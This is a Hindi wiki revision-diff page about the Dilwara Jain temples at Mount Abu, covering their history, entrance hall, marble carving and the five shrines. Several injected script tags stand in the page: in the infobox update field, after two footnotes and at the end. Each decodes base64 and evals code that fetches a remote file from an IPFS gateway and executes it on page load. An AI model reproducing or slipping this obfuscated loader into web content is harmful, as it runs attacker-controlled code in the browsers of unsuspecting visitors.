Difference between revisions of "दिलवाड़ा जैन मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "रूपय" to "रुपय")
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[चित्र:Dilwara-Temple-Mount-Abu.jpg|दिलवाड़ा जैन मंदिर, [[माउंट आबू]] <br /> Dilwara Jain Temple, Mount Abu|thumb|300px]]  
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Dilwara-Jain-Temples.jpg
 +
|चित्र का नाम=दिलवाड़ा जैन मंदिर, माउंट आबू
 +
|विवरण=दिलवाड़ा जैन मंदिर [[राजस्थान]] राज्य के सिरोही ज़िले के [[माउंट आबू]] नगर में स्थित है। दिलवाड़ा मंदिर वस्तुतः पांच मंदिरों का समूह है।
 +
|राज्य=[[राजस्थान]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[सिरोही ज़िला|सिरोही ज़िले]]
 +
|निर्माता=वास्तुपाल और तेजपाल
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=11वीं - 13वीं शताब्दी
 +
|स्थापना=
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=24.609306,72.723056&ll=24.609547,72.723055&spn=0.008974,0.021136&t=m&z=16&vpsrc=6 उत्तर- 24° 36' 33.50", पूर्व- 72° 43' 23.00"]
 +
|मार्ग स्थिति=आबू रोड रेलवे स्टेशन से लगभग 30 किमी की दूरी पर स्थित है।
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि
 +
|हवाई अड्डा=महाराणा प्रताप हवाई अड्डा
 +
|रेलवे स्टेशन=आबू रोड रेलवे स्टेशन
 +
|बस अड्डा=माउंट आबू बस अड्डा
 +
|यातायात=स्थानीय बस, ऑटो रिक्शा, साईकिल रिक्शा
 +
|क्या देखें=
 +
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=02974
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.com/maps?saddr=Dabok+Airport,+Rajasthan,+India&daddr=Dilwara+Jain+Temple,+Mount+Abu,+Rajasthan,+India&hl=en&ll=24.679466,73.487549&spn=1.148008,2.705383&sll=24.606952,72.72372&sspn=0.008974,0.021136&geocode=FRyidwEdLIpnBCHNSgsvrHWwDA%3BFUaDdwEdH6hVBCFoEgb17qtXBA&vpsrc=6&mra=ls&t=m&z=9 गूगल मानचित्र]
 +
|संबंधित लेख=[[नक्की झील]], [[गोमुख मंदिर]], [[अर्बुदा देवी मन्दिर]], [[अचलगढ़ क़िला]], [[माउंट आबू वन्यजीव अभयारण्य]], [[गुरु शिखर]]
 +
|शीर्षक 1=[[भाषा]]
 +
|पाठ 1=[[हिंदी भाषा|हिंदी]], [[राजस्थानी भाषा|राजस्थानी]], [[अंग्रेजी भाषा|अंग्रेजी]]
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=जैन मंदिर स्थापत्य कला के उत्कृष्ट नमूने है। पाँच मंदिरों के इस समूह में विमल वासाही मन्दिर सबसे पुराना है। इन मंदिरों की अद्भुत कारीगरी देखने योग्य है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|11:10, 21 दिसम्बर 2011 (IST)}}
 +
}}
  
दिलवाड़ा जैन मंदिर [[राजस्थान]] राज्य के सिरोही ज़िले के [[माउंट आबू]] नगर में स्थित है। दिलवाड़ा मंदिर वस्तुतः पांच मंदिरों का समूह है। इन मंदिरों का निर्माण 11वीं से 13वीं शताब्दी के बीच में हुआ था। यह विशाल एवं दिव्य मंदिर [[जैन धर्म]] के [[तीर्थंकर|तीर्थंकरों]] को समर्पित है।<ref name="mm">{{cite web |url=http://ns4.hanscybertechnologies.net/jain-dilwada.php |title=दिलवाड़ा जैन मंदिर |accessmonthday=[[16 मई]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=मेमोरी म्यूज़ियम |language=[[हिन्दी]] }}</ref>
+
दिलवाड़ा जैन मंदिर [[राजस्थान]] राज्य के [[सिरोही ज़िला|सिरोही ज़िले]] के [[माउंट आबू]] नगर में स्थित है। दिलवाड़ा मंदिर वस्तुतः पांच मंदिरों का समूह है। इन मंदिरों का निर्माण 11वीं से 13वीं शताब्दी के बीच में हुआ था। यह विशाल एवं दिव्य मंदिर [[जैन धर्म]] के [[तीर्थंकर|तीर्थंकरों]] को समर्पित है।<ref name="mm">{{cite web |url=http://ns4.hanscybertechnologies.net/jain-dilwada.php |title=दिलवाड़ा जैन मंदिर |accessmonthday=[[16 मई]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=मेमोरी म्यूज़ियम |language=[[हिन्दी]] }}</ref>
 
==इतिहास==
 
==इतिहास==
दिलवाड़ा जैन मंदिर 11वीं से 13वीं शताब्दी के दौरान चालुक्य राजाओं वास्तुपाल और तेजपाल नामक दो भाईयों द्वारा 1231 ई.में बनवाया गया था। जैन वास्तुकला के सर्वोत्कृष्ट उदाहरण-स्वरूप दो प्रसिद्ध संगमरमर के बने मंदिर जो दिलवाड़ा या देवलवाड़ा मंदिर कहलाते हैं इस पर्वतीय नगर के जगत् प्रसिद्ध स्मारक हैं। विमलसाह ने पहले कुंभेरिया में पार्श्वनाथ के 360 मंदिर बनवाए थे किंतु उनकी इष्टदेवी अंबा जी ने किसी बात पर रुष्ट होकर पाँच मंदिरों को छोड़ अवशिष्ट सारे मंदिर नष्ट कर दिए और स्वप्न में उन्हें दिलवाड़ा में आदिनाथ का मंदिर बनाने का आदेश दिया। किंतु आबूपर्वत के परमार नरेश ने विमलसाह को मंदिर के लिए भूमि देना तभी स्वीकार किया जब उन्होंने संपूर्ण भूमि को रजतखंडों से ढक दिया। इस प्रकार 56 लाख रूपय में यह ज़मीन ख़रीदी गई थी। दिलवाड़ा जैन मंदिर प्राचीन वास्तुकला का एक उत्कृष्ट उदाहरण हैं। यह शानदार मंदिर जैन धर्म के र्तीथकरों को समर्पित हैं।<ref name="वेब वार्ता" />
+
दिलवाड़ा जैन मंदिर 11वीं से 13वीं शताब्दी के दौरान [[चालुक्य]] राजाओं वास्तुपाल और तेजपाल नामक दो भाईयों द्वारा 1231 ई. में बनवाया गया था। जैन वास्तुकला के सर्वोत्कृष्ट उदाहरण-स्वरूप दो प्रसिद्ध संगमरमर के बने मंदिर जो दिलवाड़ा या देवलवाड़ा मंदिर कहलाते हैं इस पर्वतीय नगर के जगत् प्रसिद्ध स्मारक हैं। विमलसाह ने पहले कुंभेरिया में पार्श्वनाथ के 360 मंदिर बनवाए थे किंतु उनकी इष्टदेवी अंबा जी ने किसी बात पर रुष्ट होकर पाँच मंदिरों को छोड़ अवशिष्ट सारे मंदिर नष्ट कर दिए और स्वप्न में उन्हें दिलवाड़ा में आदिनाथ का मंदिर बनाने का आदेश दिया। किंतु आबूपर्वत के परमार नरेश ने विमलसाह को मंदिर के लिए भूमि देना तभी स्वीकार किया जब उन्होंने संपूर्ण भूमि को रजतखंडों से ढक दिया। इस प्रकार 56 लाख रुपय में यह ज़मीन ख़रीदी गई थी। दिलवाड़ा जैन मंदिर प्राचीन वास्तुकला का एक उत्कृष्ट उदाहरण हैं। यह शानदार मंदिर जैन धर्म के र्तीथकरों को समर्पित हैं।<ref name="वेब वार्ता" />
 
==प्रवेश द्वार==
 
==प्रवेश द्वार==
 
दिलवाड़ा जैन मंदिर का प्रवेशद्वार गुंबद वाले मंडप से हो कर है जिसके सामने एक वर्गाकृति भवन है। इसमें छ: स्तंभ और दस [[हाथी|हाथियों]] की प्रतिमाएं हैं। इसके पीछे मध्य में मुख्य पूजागृह है जिसमें एक प्रकोष्ठ में ध्यानमुद्रा में अवस्थित जिन की मूर्ति हैं।  
 
दिलवाड़ा जैन मंदिर का प्रवेशद्वार गुंबद वाले मंडप से हो कर है जिसके सामने एक वर्गाकृति भवन है। इसमें छ: स्तंभ और दस [[हाथी|हाथियों]] की प्रतिमाएं हैं। इसके पीछे मध्य में मुख्य पूजागृह है जिसमें एक प्रकोष्ठ में ध्यानमुद्रा में अवस्थित जिन की मूर्ति हैं।  
Line 13: Line 52:
 
बाहर से मंदिर नितांत सामान्य दिखाई देता है और इससे भीतर के अद्भुत कलावैभव का तनिक भी आभास नहीं होता। किंतु श्वेत संगमरमर के गुंबद का भीतरी भाग, दीवारें, छतें तथा स्तंभ अपनी महीन नक़्क़ाशी और अभूतपूर्व मूर्तिकारी के लिए संसार-प्रसिद्ध हैं। इस मूर्तिकारी में तरह-तरह के फूल-पत्ते, पशु-पक्षी तथा मानवों की आकृतियां इतनी बारीकी से चित्रित हैं मानो यहाँ के शिल्पियों की छेनी के सामने कठोर संगमरमर मोम बन गया हो। पत्थर की शिल्पकला का इतना महान् वैभव [[भारत]] में अन्यत्र नहीं है। दूसरा मंदिर जो तेजपाल का कहलाता है, निकट ही है और पहले की अपेक्षा प्रत्येक बात में अधिक भव्य और शानदार दिखाई देता है। इसी शैली में बने तीन अन्य जैन-मन्दिर भी यहाँ आसपास ही हैं। किंवदंती है कि वशिष्ठ का आश्रम देवलवाड़ा के निकट ही स्थित था।<ref name="वेब वार्ता" />
 
बाहर से मंदिर नितांत सामान्य दिखाई देता है और इससे भीतर के अद्भुत कलावैभव का तनिक भी आभास नहीं होता। किंतु श्वेत संगमरमर के गुंबद का भीतरी भाग, दीवारें, छतें तथा स्तंभ अपनी महीन नक़्क़ाशी और अभूतपूर्व मूर्तिकारी के लिए संसार-प्रसिद्ध हैं। इस मूर्तिकारी में तरह-तरह के फूल-पत्ते, पशु-पक्षी तथा मानवों की आकृतियां इतनी बारीकी से चित्रित हैं मानो यहाँ के शिल्पियों की छेनी के सामने कठोर संगमरमर मोम बन गया हो। पत्थर की शिल्पकला का इतना महान् वैभव [[भारत]] में अन्यत्र नहीं है। दूसरा मंदिर जो तेजपाल का कहलाता है, निकट ही है और पहले की अपेक्षा प्रत्येक बात में अधिक भव्य और शानदार दिखाई देता है। इसी शैली में बने तीन अन्य जैन-मन्दिर भी यहाँ आसपास ही हैं। किंवदंती है कि वशिष्ठ का आश्रम देवलवाड़ा के निकट ही स्थित था।<ref name="वेब वार्ता" />
 
==अन्य मंदिर==
 
==अन्य मंदिर==
यहाँ के पांच मंदिरों में दो विशाल मंदिर है तथा तीन मंदिर उसके अनुपूरक है। यहाँ पर विमल वासाही मंदिर प्रथम [[तीर्थंकर]] को समर्पित सबसे प्राचीन है, बाइसवें तीर्थंकर नेमीनाथ को समर्पित लुन वासाही मंदिर भी बहुत दर्शनीय है। यहाँ पर भगवान कुंथुनाथ का दिगम्बर जैन मंदिर भी स्थापित है। यहाँ पर एक अदभुत देवरानी जेठानी का मंदिर भी है जिसमें परमपूजनीय भगवान आदिनाथ एवं शान्तिनाथ जी की मूर्तियां स्थापित है। यहाँ के मंदिर परिसर में खरतरसाही, पीतलहर और भगवान [[महावीर]] का मंदिर भी स्थित है इनमें भगवान महावीर स्वामी का मंदिर सबसे छोटा बना हुआ है।<ref name="mm"/>
+
यहाँ के पांच मंदिरों में दो विशाल मंदिर है तथा तीन मंदिर उसके अनुपूरक है। यहाँ पर विमल वासाही मंदिर प्रथम [[तीर्थंकर]] को समर्पित सबसे प्राचीन है, बाइसवें तीर्थंकर नेमीनाथ को समर्पित लुन वासाही मंदिर भी बहुत दर्शनीय है। यहाँ पर भगवान [[कुंथुनाथ]] का दिगम्बर जैन मंदिर भी स्थापित है। यहाँ पर एक अदभुत देवरानी जेठानी का मंदिर भी है जिसमें परमपूजनीय भगवान आदिनाथ एवं शान्तिनाथ जी की मूर्तियां स्थापित है। यहाँ के मंदिर परिसर में खरतरसाही, पीतलहर और भगवान [[महावीर]] का मंदिर भी स्थित है इनमें भगवान महावीर स्वामी का मंदिर सबसे छोटा बना हुआ है।<ref name="mm"/>
  
{{प्रचार}}
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
|प्रारम्भिक=प्रारम्भिक2
+
|प्रारम्भिक=प्रारम्भिक3
 
|माध्यमिक=  
 
|माध्यमिक=  
 
|पूर्णता=  
 
|पूर्णता=  
Line 27: Line 65:
 
<gallery>
 
<gallery>
 
चित्र:Dilwara-Jain-Temples-1.jpg|दिलवाड़ा जैन मंदिर, [[माउंट आबू]]
 
चित्र:Dilwara-Jain-Temples-1.jpg|दिलवाड़ा जैन मंदिर, [[माउंट आबू]]
चित्र:Dilwara-Jain-Temples.jpg|दिलवाड़ा जैन मंदिर, [[माउंट आबू]]
+
चित्र:Dilwara-Temple-Mount-Abu.jpg|दिलवाड़ा जैन मंदिर, [[माउंट आबू]]
 
</gallery>
 
</gallery>
  
Line 38: Line 76:
 
*[http://mkldh70.blogspot.com/2011/04/blog-post_26.html दिलवाडा टेम्पल , माउन्ट आबू , राजस्थान]
 
*[http://mkldh70.blogspot.com/2011/04/blog-post_26.html दिलवाडा टेम्पल , माउन्ट आबू , राजस्थान]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान के पर्यटन स्थल}}
+
{{राजस्थान के पर्यटन स्थल}}{{जैन धर्म2}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
Line 46: Line 84:
 
[[Category:राजस्थान के धार्मिक स्थल]]
 
[[Category:राजस्थान के धार्मिक स्थल]]
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:धार्मिक स्थल कोश]]
 +
[[Category:जैन धार्मिक स्थल]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 10:26, 5 July 2017

dilava da jain mandir
vivaran dilava da jain mandir rajasthan rajy ke sirohi zile ke mauant aboo nagar mean sthit hai. dilava da mandir vastutah paanch mandiroan ka samooh hai.
rajy rajasthan
zila sirohi zile
nirmata vastupal aur tejapal
nirman kal 11vian - 13vian shatabdi
bhaugolik sthiti uttar- 24° 36' 33.50", poorv- 72° 43' 23.00"
marg sthiti aboo rod relave steshan se lagabhag 30 kimi ki doori par sthit hai.
kaise pahuanchean havaee jahaz, rel, bas adi
havaee adda maharana pratap havaee adda
relave steshan aboo rod relave steshan
bas adda mauant aboo bas adda
yatayat sthaniy bas, aauto riksha, saeekil riksha
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 02974
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
sanbandhit lekh nakki jhil, gomukh mandir, arbuda devi mandir, achalagadh qila, mauant aboo vanyajiv abhayarany, guru shikhar bhasha hiandi, rajasthani, aangreji
any janakari jain mandir sthapaty kala ke utkrisht namoone hai. paanch mandiroan ke is samooh mean vimal vasahi mandir sabase purana hai. in mandiroan ki adbhut karigari dekhane yogy hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

dilava da jain mandir rajasthan rajy ke sirohi zile ke mauant aboo nagar mean sthit hai. dilava da mandir vastutah paanch mandiroan ka samooh hai. in mandiroan ka nirman 11vian se 13vian shatabdi ke bich mean hua tha. yah vishal evan divy mandir jain dharm ke tirthankaroan ko samarpit hai.[1]

itihas

dilava da jain mandir 11vian se 13vian shatabdi ke dauran chaluky rajaoan vastupal aur tejapal namak do bhaeeyoan dvara 1231 ee. mean banavaya gaya tha. jain vastukala ke sarvotkrisht udaharan-svaroop do prasiddh sangamaramar ke bane mandir jo dilava da ya devalava da mandir kahalate haian is parvatiy nagar ke jagath prasiddh smarak haian. vimalasah ne pahale kuanbheriya mean parshvanath ke 360 mandir banavae the kiantu unaki ishtadevi aanba ji ne kisi bat par rusht hokar paanch mandiroan ko chho d avashisht sare mandir nasht kar die aur svapn mean unhean dilava da mean adinath ka mandir banane ka adesh diya. kiantu abooparvat ke paramar naresh ne vimalasah ko mandir ke lie bhoomi dena tabhi svikar kiya jab unhoanne sanpoorn bhoomi ko rajatakhandoan se dhak diya. is prakar 56 lakh rupay mean yah zamin kharidi gee thi. dilava da jain mandir prachin vastukala ka ek utkrisht udaharan haian. yah shanadar mandir jain dharm ke rtithakaroan ko samarpit haian.[2]

pravesh dvar

dilava da jain mandir ka praveshadvar guanbad vale mandap se ho kar hai jisake samane ek vargakriti bhavan hai. isamean chh: stanbh aur das hathiyoan ki pratimaean haian. isake pichhe madhy mean mukhy poojagrih hai jisamean ek prakoshth mean dhyanamudra mean avasthit jin ki moorti haian. [[chitr:Dilwara-Jain-Temple.jpg|thumb|left|dilava da jain mandir, mauant aboo]] is prakoshth ki chhat shikhar roop mean bani hai yadyapi yah adhik ooanchi nahian hai. isake sath ek doosara prakoshth bana hai jisake age ek mandap sthit hai. is mandap ke guanbad ke ath stanbh haian. sanpoorn mandir ek praangan ke aandar ghira hua hai jisaki lanbaee 128 phut aur chau daee 75 phut hai. isake chaturdik chhote stanbhoan ki duhari panktiyaan haian jinase praangan ki lagabhag 52 kothariyoan ke age baramada-sa ban jata hai.[2]

sthapaty kala

jain mandir sthapaty kala ke utkrisht namoone hai. paanch mandiroan ke is samooh mean vimal vasahi mandir sabase purana hai. in mandiroan ki adbhut karigari dekhane yogy hai. apane aitihasik mahattv aur sangamaramar patthar par barik naqqashi ki jadoogari ke lie pahachane jane vale rajy ke sirohi zile ke in vishvavikhyat mandiroan mean shilp-sauandary ka aisa bejo d khazana hai, jise duniya mean anyatr aur kahian nahian dekha ja sakata. is mandir mean adinath ki moorti ki aankhean asali hirak ki bani huee haian. aur usake gale mean bahumooly ratnoan ka har hai. yahaan paanch mandiroan ka ek samooh hai, jo bahar se dekhane mean sadharan se pratit hote haian. phool-pattiyoan v any mohak dijainoan se alankrit, naqqashidar chhatean, pashu-pakshiyoan ki shanadar sangamaramariy akritiyaan, safed stanbhoan par bariki se uker kar banaee suandar belean, jalidar naqqashi se saje toran aur in sabase badhakar jain tirthakaroan ki pratimaean. vimal vasahi mandir ke ashtakoniy kaksh mean sthit hai.

bahar se mandir nitaant samany dikhaee deta hai aur isase bhitar ke adbhut kalavaibhav ka tanik bhi abhas nahian hota. kiantu shvet sangamaramar ke guanbad ka bhitari bhag, divarean, chhatean tatha stanbh apani mahin naqqashi aur abhootapoorv moortikari ke lie sansar-prasiddh haian. is moortikari mean tarah-tarah ke phool-patte, pashu-pakshi tatha manavoan ki akritiyaan itani bariki se chitrit haian mano yahaan ke shilpiyoan ki chheni ke samane kathor sangamaramar mom ban gaya ho. patthar ki shilpakala ka itana mahanh vaibhav bharat mean anyatr nahian hai. doosara mandir jo tejapal ka kahalata hai, nikat hi hai aur pahale ki apeksha pratyek bat mean adhik bhavy aur shanadar dikhaee deta hai. isi shaili mean bane tin any jain-mandir bhi yahaan asapas hi haian. kianvadanti hai ki vashishth ka ashram devalava da ke nikat hi sthit tha.[2]

any mandir

yahaan ke paanch mandiroan mean do vishal mandir hai tatha tin mandir usake anupoorak hai. yahaan par vimal vasahi mandir pratham tirthankar ko samarpit sabase prachin hai, baisavean tirthankar neminath ko samarpit lun vasahi mandir bhi bahut darshaniy hai. yahaan par bhagavan kuanthunath ka digambar jain mandir bhi sthapit hai. yahaan par ek adabhut devarani jethani ka mandir bhi hai jisamean paramapoojaniy bhagavan adinath evan shantinath ji ki moortiyaan sthapit hai. yahaan ke mandir parisar mean kharatarasahi, pitalahar aur bhagavan mahavir ka mandir bhi sthit hai inamean bhagavan mahavir svami ka mandir sabase chhota bana hua hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

  1. 1.0 1.1 dilava da jain mandir (hindi) (ech.ti.em.el) memori myooziyam. abhigaman tithi: 16 mee, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. 2.0 2.1 2.2 rajasthan ka khoobasoorat aur ekamatr hil steshan mauant aboo (hindi) veb varta. abhigaman tithi: 13 joon, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>